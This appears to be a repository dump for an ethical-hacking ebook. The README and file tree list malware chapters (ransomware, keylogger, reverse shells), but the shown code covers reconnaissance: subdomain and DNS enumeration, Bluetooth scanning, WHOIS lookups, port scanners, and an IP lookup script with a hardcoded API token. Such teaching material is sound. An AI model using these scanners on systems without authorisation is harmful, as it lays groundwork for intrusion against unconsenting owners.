├── LICENSE ├── README.md ├── chapter-1 ├── bluetooth-scanner │ ├── bluetooth_scanner.py │ └── requirements.txt ├── domain-names │ ├── dns_enumeration.py │ ├── domain_info_extractor.py │ ├── domain_validator.py │ ├── domain_whois.py │ ├── fast_subdomain_scanner.py │ ├── google.com-subdomains.txt │ ├── requirements.txt │ ├── subdomain_scanner.py │ └── subdomains.txt ├── geolocation │ ├── get_ip_info.py │ └── requirements.txt ├── port-scanning │ ├── fast_port_scanner.py │ ├── nmap_port_scanner.py │ ├── port_scanner.py │ └── requirements.txt ├── reverse-dns-lookup │ ├── requirements.txt │ ├── reverse_dns_lookup_using_socket.py │ └── reverse_dns_lookup_using_viewdns.py └── username-search-tool │ ├── README.md │ ├── requirements.txt │ └── username_search_custom.py ├── chapter-2 ├── advanced-reverse-shell │ ├── client.py │ ├── notes.txt │ ├── requirements.txt │ └── server.py ├── fork-bomb │ ├── README.md │ ├── end_python_processes.py │ ├── fork_bomb.py │ ├── fork_bomb_simplest.py │ └── terminal_spawn_bomb.py ├── keylogger │ ├── keylogger.py │ └── requirements.txt ├── persistent-malware │ └── persistent_malware.py ├── ransomware │ ├── ransomware.py │ ├── requirements.txt │ └── test-folder │ │ ├── Documents │ │ ├── free-Chapter 1_ Introduction-to-PDF-Processing-in-Python.pdf │ │ └── free-Chapter_2_Building_Malware.pdf │ │ ├── Files │ │ ├── Archive │ │ │ └── my-archive.zip │ │ └── Programs │ │ │ └── 7z2107-x64.exe │ │ ├── Pictures │ │ ├── cat face flat.jpg │ │ └── cute_dog_flat_light.png │ │ ├── test.txt │ │ ├── test2.txt │ │ └── test3.txt └── simple-reverse-shell │ ├── client.py │ └── server.py ├── chapter-3 ├── cracking │ ├── bruteforce-ftp │ │ ├── bruteforce_ftp.py │ │ ├── requirements.txt │ │ └── wordlist.txt │ ├── bruteforce-ssh │ │ ├── bruteforce_ssh.py │ │ └── requirements.txt │ ├── hash-cracker │ │ ├── benchmark_speed.py │ │ ├── crack_hashes.py │ │ ├── requirements.txt │ │ ├── simple_hashing.py │ │ └── wordlist.txt │ ├── pdf-cracker │ │ ├── foo-protected.pdf │ │ ├── 
pdf_cracker_pikepdf.py │ │ ├── pdf_cracker_pymupdf.py │ │ └── requirements.txt │ └── zip-cracker │ │ ├── requirements.txt │ │ ├── secret.zip │ │ └── zip_cracker.py ├── locking-files │ ├── files │ │ ├── example.pdf │ │ ├── image.jpg │ │ ├── locked_example.pdf │ │ └── secure_example.zip │ ├── locking_pdf.py │ ├── locking_zip.py │ └── requirements.txt ├── password-evaluator │ ├── password_evaluator.py │ ├── password_strength_evaluator.py │ ├── requirements.txt │ └── using_zxcvbn.py ├── passwordgenerator │ └── password_generator.py └── wordlist-generator │ ├── ab.txt │ ├── aeiou.txt │ └── wordlist_generator.py ├── chapter-4 ├── extract-chrome-data │ ├── chrome_cookie.py │ ├── chromepass.py │ ├── credentials.txt │ ├── deletepass.py │ └── requirements.txt ├── extract-metadata-from-files │ ├── files │ │ ├── cleaned_example.docx │ │ ├── cleaned_example.pdf │ │ ├── cleaned_image.jpg │ │ ├── example.docx │ │ ├── example.pdf │ │ └── image.jpg │ ├── metadata.py │ └── requirements.txt ├── extract-wifi-passwords │ ├── extract_wifi_passwords.py │ └── output.md ├── fake-data-generation │ ├── generate_fake_data.py │ └── requirements.txt ├── file-integrity │ ├── README.md │ ├── example.txt │ └── verify_file_integrity.py ├── mac-address-changer │ ├── mac_address_changer_linux.py │ ├── mac_address_changer_windows.py │ └── requirements.txt ├── remove-metadata │ ├── files │ │ ├── cleaned_example.docx │ │ ├── cleaned_example.pdf │ │ ├── example.docx │ │ └── example.pdf │ ├── remove_metadata_from_docx.py │ ├── remove_metadata_from_images.py │ ├── remove_metadata_from_media.py │ ├── remove_metadata_from_pdf.py │ └── requirements.txt └── steganography │ ├── requirements.txt │ └── steganography.py ├── chapter-5 ├── advanced-network-scanner │ ├── advanced_network_scanner.py │ ├── notes.md │ └── requirements.txt ├── arp-spoof │ ├── arp_spoof.py │ ├── output.md │ ├── requirements.txt │ └── services.py ├── detect-arp-spoof │ ├── arp_spoof_detector.py │ └── requirements.txt ├── dhcp-listener │ 
├── dhcp_listener.py │ ├── output.md │ └── requirements.txt ├── disconnect-devices │ ├── network_kicker.py │ ├── output.md │ └── requirements.txt ├── dns-spoof │ ├── dns_spoofer.py │ └── requirements.txt ├── fake-access-points │ ├── fake_access_points_forger.py │ ├── output.md │ └── simple_fake_access_point_forger.py ├── inject-code-onto-http │ ├── code_injector.py │ ├── output.md │ └── requirements.txt ├── network-scanner │ ├── output.md │ ├── requirements.txt │ └── simple_network_scanner.py ├── sniff-http-packets │ ├── output.md │ ├── requirements.txt │ └── sniff_http.py ├── syn-flood │ ├── output.md │ ├── requirements.txt │ └── syn_flood.py └── wifi-scanner │ ├── output.md │ ├── requirements.txt │ └── wifi_scanner.py └── chapter-6 └── email-spider ├── Screenshot.jpg ├── advanced_email_spider.py ├── email_harvester.py └── requirements.txt /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2022 Rockikz 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Tools & Scripts Built in the [Ethical Hacking with Python EBook](https://www.thepythoncode.com/ethical-hacking-with-python-ebook) 2 | 3 | The tools and scripts are built in the [Ethical Hacking with Python Ebook](https://www.thepythoncode.com/ethical-hacking-with-python-ebook). 4 | 5 | More Python programs will be added to this repository as the book will be constantly improved and enriched. 6 | 7 | Each of the tools and scripts is in a separate folder containing the `requirements.txt` to be installed via the following command: 8 | ``` 9 | pip install -r requirements.txt 10 | ``` 11 | The tools and scripts are: 12 | ## Chapter 1: [Information Gathering](chapter-1/) 13 | - [Extracting Domain Name Info & Subdomain Scanner](chapter-1/domain-names/) 14 | - [Reverse DNS Lookup](chapter-1/reverse-dns-lookup/) 15 | - [Geolocating IP Addresses](chapter-1/geolocation/) 16 | - [Port Scanning](chapter-1/port-scanning/) 17 | - [Username Search Tool](chapter-1/username-search-tool/) 18 | - [Bluetooth Scanner](chapter-1/bluetooth-scanner/) 19 | ## Chapter 2: [Building Malware](chapter-2/) 20 | - [Making a Ransomware](chapter-2/ransomware/) 21 | - [Making a Keylogger](chapter-2/keylogger/) 22 | - [Making a Fork Bomb](chapter-2/fork-bomb/) 23 | - [Making a Reverse Shell](chapter-2/simple-reverse-shell/) 24 | - [Making an Advanced Reverse Shell](chapter-2/advanced-reverse-shell/) 25 | - [Making Malware Persistence](chapter-2/persistent-malware/) 26 | ## Chapter 3: [Building Password Crackers](chapter-3/) 27 | - [Wordlist 
Generator](chapter-3/wordlist-generator/) 28 | - [Locking PDF/ZIP Files with Passwords](chapter-3/locking-files/) 29 | - [Cracking ZIP Files](chapter-3/cracking/zip-cracker/) 30 | - [Cracking PDF Files](chapter-3/cracking/pdf-cracker/) 31 | - [Bruteforcing SSH Servers](chapter-3/cracking/bruteforce-ssh/) 32 | - [Bruteforcing FTP Servers](chapter-3/cracking/bruteforce-ftp/) 33 | - [Cryptographic Hashes](chapter-3/cracking/hash-cracker/) 34 | - [Making a Password Generator](chapter-3/passwordgenerator/) 35 | - [Checking Password Strength](chapter-3/password-evaluator/) 36 | ## Chapter 4: [Forensic Investigations](chapter-4/) 37 | - [Extracting Metadata from Files](chapter-4/extract-metadata-from-files/) 38 | - [Extracting PDF Metadata](chapter-4/extract-metadata-from-files/) 39 | - [Extracting Image Metadata](chapter-4/extract-metadata-from-files/) 40 | - [Extracting Audio/Video Metadata](chapter-4/extract-metadata-from-files/) 41 | - [Extracting Docx Metadata](chapter-4/extract-metadata-from-files/) 42 | - [Removing Metadata from Files](chapter-4/remove-metadata/) 43 | - [Removing Metadata from PDF Files](chapter-4/remove-metadata/) 44 | - [Removing Metadata from Image Files](chapter-4/remove-metadata/) 45 | - [Removing Metadata from Audio/Video Files](chapter-4/remove-metadata/) 46 | - [Removing Metadata from Docx Files](chapter-4/remove-metadata/) 47 | - [Extracting Passwords from Chrome Browser](chapter-4/extract-chrome-data/) 48 | - [Extracting Cookies from Chrome Browser](chapter-4/extract-chrome-data/) 49 | - [Hiding Data in Images](chapter-4/steganography/) 50 | - [Verifying File Integrity](chapter-4/file-integrity/) 51 | - [Changing your MAC Address](chapter-4/mac-address-changer/) 52 | - [Extracting Saved Wi-Fi Passwords](chapter-4/extract-wifi-passwords/) 53 | - [Generating Fake Data](chapter-4/fake-data-generation/) 54 | ## Chapter 5: [Packet Manipulation using Scapy](chapter-5/) 55 | - [DHCP Listener](chapter-5/dhcp-listener/) 56 | - [Network 
Scanner](chapter-5/network-scanner/) 57 | - [Wi-Fi Scanner](chapter-5/wifi-scanner/) 58 | - [SYN Flooding Attack](chapter-5/syn-flood) 59 | - [Creating Fake Access Points](chapter-5/fake-access-points/) 60 | - [Disconnecting Devices](chapter-5/disconnect-devices/) 61 | - [ARP Spoofing](chapter-5/arp-spoof/) 62 | - [Detecting ARP Spoofing](chapter-5/detect-arp-spoof/) 63 | - [DNS Spoofing](chapter-5/dns-spoof/) 64 | - [Sniffing HTTP Packets](chapter-5/sniff-http-packets/) 65 | - [Injecting Code into HTTP Responses](chapter-5/inject-code-onto-http/) 66 | - [Advanced Network Scanner](chapter-5/advanced-network-scanner/) 67 | ## Chapter 6: [Extracting Email Addresses from the Web](chapter-6/) 68 | - [Building a Simple Email Extractor](chapter-6/email-spider/) 69 | - [Building an Advanced Email Spider](chapter-6/email-spider/) 70 | -------------------------------------------------------------------------------- /chapter-1/bluetooth-scanner/bluetooth_scanner.py: -------------------------------------------------------------------------------- 1 | import bluetooth 2 | 3 | # Major and Minor Device Class definitions based on Bluetooth specifications 4 | MAJOR_CLASSES = { 5 | 0: "Miscellaneous", 6 | 1: "Computer", 7 | 2: "Phone", 8 | 3: "LAN/Network Access", 9 | 4: "Audio/Video", 10 | 5: "Peripheral", 11 | 6: "Imaging", 12 | 7: "Wearable", 13 | 8: "Toy", 14 | 9: "Health", 15 | 10: "Uncategorized" 16 | } 17 | 18 | MINOR_CLASSES = { 19 | # Computer Major Class 20 | (1, 0): "Uncategorized Computer", (1, 1): "Desktop Workstation", 21 | (1, 2): "Server-class Computer", (1, 3): "Laptop", (1, 4): "Handheld PC/PDA", 22 | (1, 5): "Palm-sized PC/PDA", (1, 6): "Wearable computer", 23 | # Phone Major Class 24 | (2, 0): "Uncategorized Phone", (2, 1): "Cellular", (2, 2): "Cordless", 25 | (2, 3): "Smartphone", (2, 4): "Wired modem or voice gateway", 26 | (2, 5): "Common ISDN Access", 27 | # LAN/Network Access Major Class 28 | (3, 0): "Fully available", (3, 1): "1% to 17% utilized", 29 | (3, 
2): "17% to 33% utilized", (3, 3): "33% to 50% utilized", 30 | (3, 4): "50% to 67% utilized", (3, 5): "67% to 83% utilized", 31 | (3, 6): "83% to 99% utilized", (3, 7): "No service available", 32 | # Audio/Video Major Class 33 | (4, 0): "Uncategorized A/V", (4, 1): "Wearable Headset", (4, 2): "Hands-free Device", 34 | (4, 3): "Microphone", (4, 4): "Loudspeaker", (4, 5): "Headphones", (4, 6): "Portable Audio", 35 | (4, 7): "Car audio", (4, 8): "Set-top box", (4, 9): "HiFi Audio Device", 36 | (4, 10): "VCR", (4, 11): "Video Camera", (4, 12): "Camcorder", 37 | (4, 13): "Video Monitor", (4, 14): "Video Display and Loudspeaker", 38 | (4, 15): "Video Conferencing", (4, 16): "Gaming/Toy", 39 | # Peripheral Major Class 40 | (5, 0): "Not Keyboard/Not Pointing Device", (5, 1): "Keyboard", 41 | (5, 2): "Pointing device", (5, 3): "Combo Keyboard/Pointing device", 42 | # Imaging Major Class 43 | (6, 0): "Display", (6, 1): "Camera", (6, 2): "Scanner", (6, 3): "Printer", 44 | # Wearable Major Class 45 | (7, 0): "Wristwatch", (7, 1): "Pager", (7, 2): "Jacket", 46 | (7, 3): "Helmet", (7, 4): "Glasses", 47 | # Toy Major Class 48 | (8, 0): "Robot", (8, 1): "Vehicle", 49 | (8, 2): "Doll / Action figure", 50 | (8, 3): "Controller", (8, 4): "Game", 51 | # Health Major Class 52 | (9, 0): "Undefined", (9, 1): "Blood Pressure Monitor", 53 | (9, 2): "Thermometer", (9, 3): "Weighing Scale", 54 | (9, 4): "Glucose Meter", (9, 5): "Pulse Oximeter", 55 | (9, 6): "Heart/Pulse Rate Monitor", (9, 7): "Health Data Display", 56 | (9, 8): "Step Counter", (9, 9): "Body Composition Analyzer", 57 | (9, 10): "Peak Flow Monitor", (9, 11): "Medication Monitor", 58 | (9, 12): "Knee Prosthesis", (9, 13): "Ankle Prosthesis", 59 | # More specific definitions can be added if needed 60 | } 61 | 62 | def parse_device_class(device_class): 63 | major = (device_class >> 8) & 0x1F # divide by 2**8 and mask with 0x1F (take the last 5 bits) 64 | minor = (device_class >> 2) & 0x3F # divide by 2**2 and mask with 0x3F 
(take the last 6 bits) 65 | major_class_name = MAJOR_CLASSES.get(major, "Unknown Major Class") 66 | minor_class_key = (major, minor) 67 | minor_class_name = MINOR_CLASSES.get(minor_class_key, "Unknown Minor Class") 68 | return major_class_name, minor_class_name 69 | 70 | def scan_bluetooth_devices(): 71 | try: 72 | discovered_devices = bluetooth.discover_devices(duration=8, lookup_names=True, lookup_class=True) 73 | print('[!] Scanning for Bluetooth devices...') 74 | print(f"[!] Found {len(discovered_devices)} Devices") 75 | for addr, name, device_class in discovered_devices: 76 | major_class, minor_class = parse_device_class(device_class) 77 | print(f"[+] Device Name: {name}") 78 | print(f" Address: {addr}") 79 | print(f" Device Class: {device_class} ({major_class}, {minor_class})") 80 | except Exception as e: 81 | print(f"[ERROR] An error occurred: {e}") 82 | 83 | if __name__ == "__main__": 84 | scan_bluetooth_devices() 85 | -------------------------------------------------------------------------------- /chapter-1/bluetooth-scanner/requirements.txt: -------------------------------------------------------------------------------- 1 | pybluez -------------------------------------------------------------------------------- /chapter-1/domain-names/dns_enumeration.py: -------------------------------------------------------------------------------- 1 | import dns.resolver 2 | 3 | # Set the target domain and record type 4 | target_domain = "thepythoncode.com" 5 | record_types = ["A", "AAAA", "CNAME", "MX", "NS", "SOA", "TXT"] 6 | 7 | # Create a DNS resolver 8 | resolver = dns.resolver.Resolver() 9 | 10 | for record_type in record_types: 11 | # Perform DNS lookup for the target domain and record type 12 | try: 13 | answers = resolver.resolve(target_domain, record_type) 14 | except dns.resolver.NoAnswer: 15 | continue 16 | 17 | # Print the DNS records found 18 | print(f"DNS records for {target_domain} ({record_type}):") 19 | for rdata in answers: 20 | print(rdata) 21 | 
-------------------------------------------------------------------------------- /chapter-1/domain-names/domain_info_extractor.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import whois 3 | import dns.resolver 4 | import argparse 5 | 6 | 7 | def is_registered(domain_name): 8 | """ 9 | A function that returns a boolean indicating 10 | whether a `domain_name` is registered 11 | """ 12 | try: 13 | w = whois.whois(domain_name) 14 | except Exception: 15 | return False 16 | else: 17 | return bool(w.domain_name) 18 | 19 | 20 | def get_discovered_subdomains(domain, subdomain_list, timeout=2): 21 | # a list of discovered subdomains 22 | discovered_subdomains = [] 23 | for subdomain in subdomain_list: 24 | # construct the url 25 | url = f"http://{subdomain}.{domain}" 26 | try: 27 | # if this raises a connection error, that means the subdomain does not exist 28 | requests.get(url, timeout=timeout) 29 | except requests.ConnectionError: 30 | # if the subdomain does not exist, just pass, print nothing 31 | pass 32 | else: 33 | print("[+] Discovered subdomain:", url) 34 | # append the discovered subdomain to our list 35 | discovered_subdomains.append(url) 36 | 37 | return discovered_subdomains 38 | 39 | def resolve_dns_records(target_domain): 40 | """A function that resolves DNS records for a `target_domain`""" 41 | # List of record types to resolve 42 | record_types = ["A", "AAAA", "CNAME", "MX", "NS", "SOA", "TXT"] 43 | # Create a DNS resolver 44 | resolver = dns.resolver.Resolver() 45 | for record_type in record_types: 46 | # Perform DNS lookup for the target domain and record type 47 | try: 48 | answers = resolver.resolve(target_domain, record_type) 49 | except dns.resolver.NoAnswer: 50 | continue 51 | # Print the DNS records found 52 | print(f"DNS records for {target_domain} ({record_type}):") 53 | for rdata in answers: 54 | print(rdata) 55 | 56 | if __name__ == "__main__": 57 | parser = 
argparse.ArgumentParser(description="Domain name information extractor, uses WHOIS db and scans for subdomains") 58 | parser.add_argument("domain", help="The domain name without http(s)") 59 | parser.add_argument("-t", "--timeout", type=int, default=2, 60 | help="The timeout in seconds for prompting the connection, default is 2") 61 | parser.add_argument("-s", "--subdomains", default="subdomains.txt", 62 | help="The file path that contains the list of subdomains to scan, default is subdomains.txt") 63 | parser.add_argument("-o", "--output", 64 | help="The output file path resulting the discovered subdomains, default is {domain}-subdomains.txt") 65 | 66 | # parse the command-line arguments 67 | args = parser.parse_args() 68 | if is_registered(args.domain): 69 | whois_info = whois.whois(args.domain) 70 | # print the registrar 71 | print("Domain registrar:", whois_info.registrar) 72 | # print the WHOIS server 73 | print("WHOIS server:", whois_info.whois_server) 74 | # get the creation time 75 | print("Domain creation date:", whois_info.creation_date) 76 | # get expiration date 77 | print("Expiration date:", whois_info.expiration_date) 78 | # print all other info 79 | print(whois_info) 80 | print("="*50, "DNS records", "="*50) 81 | resolve_dns_records(args.domain) 82 | print("="*50, "Scanning subdomains", "="*50) 83 | # read all subdomains 84 | with open(args.subdomains) as file: 85 | # read all content 86 | content = file.read() 87 | # split by new lines 88 | subdomains = content.splitlines() 89 | discovered_subdomains = get_discovered_subdomains(args.domain, subdomains) 90 | # make the discovered subdomains filename dependant on the domain 91 | discovered_subdomains_file = f"{args.domain}-subdomains.txt" 92 | # save the discovered subdomains into a file 93 | with open(discovered_subdomains_file, "w") as f: 94 | for subdomain in discovered_subdomains: 95 | print(subdomain, file=f) -------------------------------------------------------------------------------- 
/chapter-1/domain-names/domain_validator.py: -------------------------------------------------------------------------------- 1 | import whois # pip install python-whois 2 | 3 | def is_registered(domain_name): 4 | """ 5 | A function that returns a boolean indicating 6 | whether a `domain_name` is registered 7 | """ 8 | try: 9 | w = whois.whois(domain_name) 10 | except Exception: 11 | return False 12 | else: 13 | return bool(w.domain_name) 14 | 15 | 16 | if __name__ == "__main__": 17 | print(is_registered("google.com")) 18 | print(is_registered("something-that-do-not-exist.com")) -------------------------------------------------------------------------------- /chapter-1/domain-names/domain_whois.py: -------------------------------------------------------------------------------- 1 | import whois 2 | from domain_validator import is_registered 3 | 4 | domain_name = "google.com" 5 | if is_registered(domain_name): 6 | whois_info = whois.whois(domain_name) 7 | # print the registrar 8 | print("Domain registrar:", whois_info.registrar) 9 | # print the WHOIS server 10 | print("WHOIS server:", whois_info.whois_server) 11 | # get the creation time 12 | print("Domain creation date:", whois_info.creation_date) 13 | # get expiration date 14 | print("Expiration date:", whois_info.expiration_date) 15 | # print all other info 16 | print(whois_info) -------------------------------------------------------------------------------- /chapter-1/domain-names/fast_subdomain_scanner.py: -------------------------------------------------------------------------------- 1 | import requests 2 | from threading import Thread, Lock 3 | from queue import Queue 4 | 5 | q = Queue() 6 | list_lock = Lock() 7 | discovered_domains = [] 8 | 9 | def scan_subdomains(domain): 10 | global q 11 | while True: 12 | # get the subdomain from the queue 13 | subdomain = q.get() 14 | # scan the subdomain 15 | url = f"http://{subdomain}.{domain}" 16 | try: 17 | requests.get(url) 18 | except requests.ConnectionError: 19 
| pass 20 | else: 21 | print("[+] Discovered subdomain:", url) 22 | # add the subdomain to the global list 23 | with list_lock: 24 | discovered_domains.append(url) 25 | 26 | # we're done with scanning that subdomain 27 | q.task_done() 28 | 29 | 30 | def main(domain, n_threads, subdomains): 31 | global q 32 | 33 | # fill the queue with all the subdomains 34 | for subdomain in subdomains: 35 | q.put(subdomain) 36 | 37 | for t in range(n_threads): 38 | # start all threads 39 | worker = Thread(target=scan_subdomains, args=(domain,)) 40 | # daemon thread means a thread that will end when the main thread ends 41 | worker.daemon = True 42 | worker.start() 43 | 44 | 45 | if __name__ == "__main__": 46 | import argparse 47 | parser = argparse.ArgumentParser(description="Faster Subdomain Scanner using Threads") 48 | parser.add_argument("domain", help="Domain to scan for subdomains without protocol (e.g without 'http://' or 'https://')") 49 | parser.add_argument("-l", "--wordlist", help="File that contains all subdomains to scan, line by line. Default is subdomains.txt", 50 | default="subdomains.txt") 51 | parser.add_argument("-t", "--num-threads", help="Number of threads to use to scan the domain. 
Default is 10", default=10, type=int) 52 | parser.add_argument("-o", "--output-file", help="Specify the output text file to write discovered subdomains", default="discovered-subdomains.txt") 53 | 54 | args = parser.parse_args() 55 | domain = args.domain 56 | wordlist = args.wordlist 57 | num_threads = args.num_threads 58 | output_file = args.output_file 59 | 60 | main(domain=domain, n_threads=num_threads, subdomains=open(wordlist).read().splitlines()) 61 | q.join() 62 | 63 | # save the file 64 | with open(output_file, "w") as f: 65 | for url in discovered_domains: 66 | print(url, file=f) -------------------------------------------------------------------------------- /chapter-1/domain-names/google.com-subdomains.txt: -------------------------------------------------------------------------------- 1 | http://www.google.com 2 | http://mail.google.com 3 | http://m.google.com 4 | http://blog.google.com 5 | http://admin.google.com 6 | http://news.google.com 7 | http://support.google.com 8 | http://mobile.google.com 9 | http://docs.google.com 10 | http://calendar.google.com 11 | http://web.google.com 12 | http://email.google.com 13 | http://images.google.com 14 | http://video.google.com 15 | http://api.google.com 16 | http://search.google.com 17 | http://chat.google.com 18 | http://wap.google.com 19 | http://sites.google.com 20 | http://ads.google.com 21 | http://apps.google.com 22 | http://download.google.com 23 | http://store.google.com 24 | http://files.google.com 25 | http://sms.google.com 26 | http://ipv4.google.com 27 | -------------------------------------------------------------------------------- /chapter-1/domain-names/requirements.txt: -------------------------------------------------------------------------------- 1 | python-whois 2 | requests 3 | dnspython -------------------------------------------------------------------------------- /chapter-1/domain-names/subdomain_scanner.py: 
-------------------------------------------------------------------------------- 1 | import requests 2 | 3 | # the domain to scan for subdomains 4 | domain = "thepythoncode.com" 5 | 6 | # read all subdomains 7 | with open("subdomains.txt") as file: 8 | # read all content 9 | content = file.read() 10 | # split by new lines 11 | subdomains = content.splitlines() 12 | 13 | # a list of discovered subdomains 14 | discovered_subdomains = [] 15 | for subdomain in subdomains: 16 | # construct the url 17 | url = f"http://{subdomain}.{domain}" 18 | try: 19 | # if this raises an ERROR, that means the subdomain does not exist 20 | requests.get(url, timeout=2) 21 | except requests.ConnectionError: 22 | # if the subdomain does not exist, just pass, print nothing 23 | pass 24 | else: 25 | print("[+] Discovered subdomain:", url) 26 | # append the discovered subdomain to our list 27 | discovered_subdomains.append(url) 28 | 29 | # save the discovered subdomains into a file 30 | with open("discovered_subdomains.txt", "w") as f: 31 | for subdomain in discovered_subdomains: 32 | print(subdomain, file=f) -------------------------------------------------------------------------------- /chapter-1/domain-names/subdomains.txt: -------------------------------------------------------------------------------- 1 | www 2 | mail 3 | ftp 4 | localhost 5 | webmail 6 | smtp 7 | pop 8 | ns1 9 | webdisk 10 | ns2 11 | cpanel 12 | whm 13 | autodiscover 14 | autoconfig 15 | m 16 | imap 17 | test 18 | ns 19 | blog 20 | pop3 21 | dev 22 | www2 23 | admin 24 | forum 25 | news 26 | vpn 27 | ns3 28 | mail2 29 | new 30 | mysql 31 | old 32 | lists 33 | support 34 | mobile 35 | mx 36 | static 37 | docs 38 | beta 39 | shop 40 | sql 41 | secure 42 | demo 43 | cp 44 | calendar 45 | wiki 46 | web 47 | media 48 | email 49 | images 50 | img 51 | www1 52 | intranet 53 | portal 54 | video 55 | sip 56 | dns2 57 | api 58 | cdn 59 | stats 60 | dns1 61 | ns4 62 | www3 63 | dns 64 | search 65 | staging 66 | server 67 | mx1 
68 | chat 69 | wap 70 | my 71 | svn 72 | mail1 73 | sites 74 | proxy 75 | ads 76 | host 77 | crm 78 | cms 79 | backup 80 | mx2 81 | lyncdiscover 82 | info 83 | apps 84 | download 85 | remote 86 | db 87 | forums 88 | store 89 | relay 90 | files 91 | newsletter 92 | app 93 | live 94 | owa 95 | en 96 | start 97 | sms 98 | office 99 | exchange 100 | ipv4 -------------------------------------------------------------------------------- /chapter-1/geolocation/get_ip_info.py: -------------------------------------------------------------------------------- 1 | import ipinfo 2 | import sys 3 | 4 | # get the ip address from the command line 5 | try: 6 | ip_address = sys.argv[1] 7 | except IndexError: 8 | ip_address = None 9 | 10 | # access token for ipinfo.io, pur yours here 11 | access_token = '09d8c3fe6f8ed9' 12 | # create a client object with the access token 13 | handler = ipinfo.getHandler(access_token) 14 | # get the ip info 15 | details = handler.getDetails(ip_address) 16 | # print the ip info 17 | for key, value in details.all.items(): 18 | print(f"{key}: {value}") -------------------------------------------------------------------------------- /chapter-1/geolocation/requirements.txt: -------------------------------------------------------------------------------- 1 | ipinfo -------------------------------------------------------------------------------- /chapter-1/port-scanning/fast_port_scanner.py: -------------------------------------------------------------------------------- 1 | import argparse 2 | import socket # for connecting 3 | from colorama import init, Fore 4 | 5 | from threading import Thread, Lock 6 | from queue import Queue 7 | 8 | # some colors 9 | init() 10 | GREEN = Fore.GREEN 11 | RESET = Fore.RESET 12 | GRAY = Fore.LIGHTBLACK_EX 13 | 14 | # number of threads, feel free to tune this parameter as you wish 15 | N_THREADS = 200 16 | # thread queue 17 | q = Queue() 18 | print_lock = Lock() 19 | 20 | def port_scan(port): 21 | """ 22 | Scan a port on the 
global variable `host` 23 | """ 24 | try: 25 | s = socket.socket() 26 | s.connect((host, port)) 27 | except: 28 | with print_lock: 29 | print(f"{GRAY}{host:15}:{port:5} is closed {RESET}", end='\r') 30 | else: 31 | with print_lock: 32 | print(f"{GREEN}{host:15}:{port:5} is open {RESET}") 33 | finally: 34 | s.close() 35 | 36 | 37 | def scan_thread(): 38 | global q 39 | while True: 40 | # get the port number from the queue 41 | worker = q.get() 42 | # scan that port number 43 | port_scan(worker) 44 | # tells the queue that the scanning for that port 45 | # is done 46 | q.task_done() 47 | 48 | 49 | def main(host, ports): 50 | global q 51 | for t in range(N_THREADS): 52 | # for each thread, start it 53 | t = Thread(target=scan_thread) 54 | # when we set daemon to true, that thread will end when the main thread ends 55 | t.daemon = True 56 | # start the daemon thread 57 | t.start() 58 | 59 | for worker in ports: 60 | # for each port, put that port into the queue 61 | # to start scanning 62 | q.put(worker) 63 | 64 | # wait the threads ( port scanners ) to finish 65 | q.join() 66 | 67 | 68 | if __name__ == "__main__": 69 | # parse some parameters passed 70 | parser = argparse.ArgumentParser(description="Simple port scanner") 71 | parser.add_argument("host", help="Host to scan.") 72 | parser.add_argument("--ports", "-p", dest="port_range", default="1-65535", help="Port range to scan, default is 1-65535 (all ports)") 73 | args = parser.parse_args() 74 | host, port_range = args.host, args.port_range 75 | 76 | start_port, end_port = port_range.split("-") 77 | start_port, end_port = int(start_port), int(end_port) 78 | 79 | ports = [ p for p in range(start_port, end_port)] 80 | 81 | main(host, ports) -------------------------------------------------------------------------------- /chapter-1/port-scanning/nmap_port_scanner.py: -------------------------------------------------------------------------------- 1 | import nmap 2 | import sys 3 | 4 | # get the target host(s) from the 
command-line arguments 5 | target = sys.argv[1] 6 | # initialize the Nmap port scanner 7 | nm = nmap.PortScanner() 8 | print("[*] Scanning...") 9 | # scanning my router 10 | nm.scan(target) 11 | # get scan statistics 12 | scan_stats = nm.scanstats() 13 | print(f"[{scan_stats['timestr']}] Elapsed: {scan_stats['elapsed']}s " \ 14 | f"Up hosts: {scan_stats['uphosts']} Down hosts: {scan_stats['downhosts']} " \ 15 | f"Total hosts: {scan_stats['totalhosts']}") 16 | 17 | equivalent_commandline = nm.command_line() 18 | print(f"[*] Equivalent command: {equivalent_commandline}") 19 | 20 | # get all the scanned hosts 21 | hosts = nm.all_hosts() 22 | for host in hosts: 23 | # get host name 24 | hostname = nm[host].hostname() 25 | # get the addresses 26 | addresses = nm[host].get("addresses") 27 | # get the IPv4 28 | ipv4 = addresses.get("ipv4") 29 | # get the MAC address of this host 30 | mac_address = addresses.get("mac") 31 | # extract the vendor if available 32 | vendor = nm[host].get("vendor") 33 | # get the open TCP ports 34 | open_tcp_ports = nm[host].all_tcp() 35 | # get the open UDP ports 36 | open_udp_ports = nm[host].all_udp() 37 | # print details 38 | print("="*30, host, "="*30) 39 | print(f"Hostname: {hostname} IPv4: {ipv4} MAC: {mac_address}") 40 | print(f"Vendor: {vendor}") 41 | if open_tcp_ports or open_udp_ports: 42 | print("-"*30, "Ports Open", "-"*30) 43 | for tcp_port in open_tcp_ports: 44 | # get all the details available for the port 45 | port_details = nm[host].tcp(tcp_port) 46 | port_state = port_details.get("state") 47 | port_up_reason = port_details.get("reason") 48 | port_service_name = port_details.get("name") 49 | port_product_name = port_details.get("product") 50 | port_product_version = port_details.get("version") 51 | port_extrainfo = port_details.get("extrainfo") 52 | port_cpe = port_details.get("cpe") 53 | print(f" TCP Port: 